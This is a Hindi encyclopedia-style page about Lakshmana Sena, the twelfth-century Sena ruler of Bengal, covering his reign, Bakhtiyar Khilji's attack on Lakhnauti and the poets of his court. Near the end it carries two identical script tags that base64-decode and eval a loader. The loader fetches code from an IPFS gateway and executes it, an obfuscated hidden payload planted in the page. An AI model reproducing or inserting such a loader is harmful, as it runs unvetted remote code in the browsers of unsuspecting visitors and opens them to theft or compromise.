लक्ष्मण सेन

भारत डिस्कवरी प्रस्तुति
(लक्ष्मणसेन से पुनर्निर्देशित)
यहाँ जाएँ:भ्रमण, खोजें
  • बल्लाल सेन का उत्तराधिकारी लक्ष्मण सेन 1178 ई. में राजगद्दी पर बैठा।
  • उसका शासन सम्पूर्ण बंगाल पर विस्तृत था।
  • कुछ समय तक उसके राज्य सीमा दक्षिण-पूर्व में उड़ीसा और पश्चिम में वाराणसी, इलाहाबाद तक थी।
  • उसके शासनकाल के अन्तिम चरण में उसके कई सामन्तों ने विद्रोह करके स्वतंत्र राज्य की स्थापना कर ली।
  • 1202 ई. में इख़्तियारुद्दीन मुहम्मद बिन बख्तियार ख़िलजी ने लक्ष्मण सेन की राजधानी लखनौती पर आक्रमण कर उसे नष्ट कर दिया।
  • इस घटना का वर्णन मिनहाज ने 'तबकाते-नासिरी' में किया है।
  • लक्ष्मण सेन स्वयं विद्वान था। उसने बल्लाल सेन द्वारा प्रारम्भ किये गये 'उद्भुत सागर' नामक ग्रन्थ की रचना को पूरा किया।
  • श्रीधरदास उसका दरबारी कवि था।
  • इसके अतिरिक्त जयदेव, जलायुध, धोई तथा गोवर्धन उसके दरबार को सुशोभित करते थे।
  • हलायुध उसका प्रधान न्यायाधीश तथा मुख्यमंत्री था।
  • लक्ष्मणसेन वैष्णव धर्म का अनुयायी था।
  • लेखों में उसे 'परम भागवत' की उपाधि प्रदान की गयी है।
  • लक्ष्मणसेन के बाद विश्वरूप सेन तथा केशव सेन कमज़ोर उत्तराधिकारी के रूप में शासन किये।
  • लक्ष्मणसेन के राजदरबार में गीत गोविन्द के लेखक जयदेव, ब्राह्मण सर्वस्व के लेखक हलायुध एवं 'पवनदूतम्' के लेखक धोई रहते थे।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>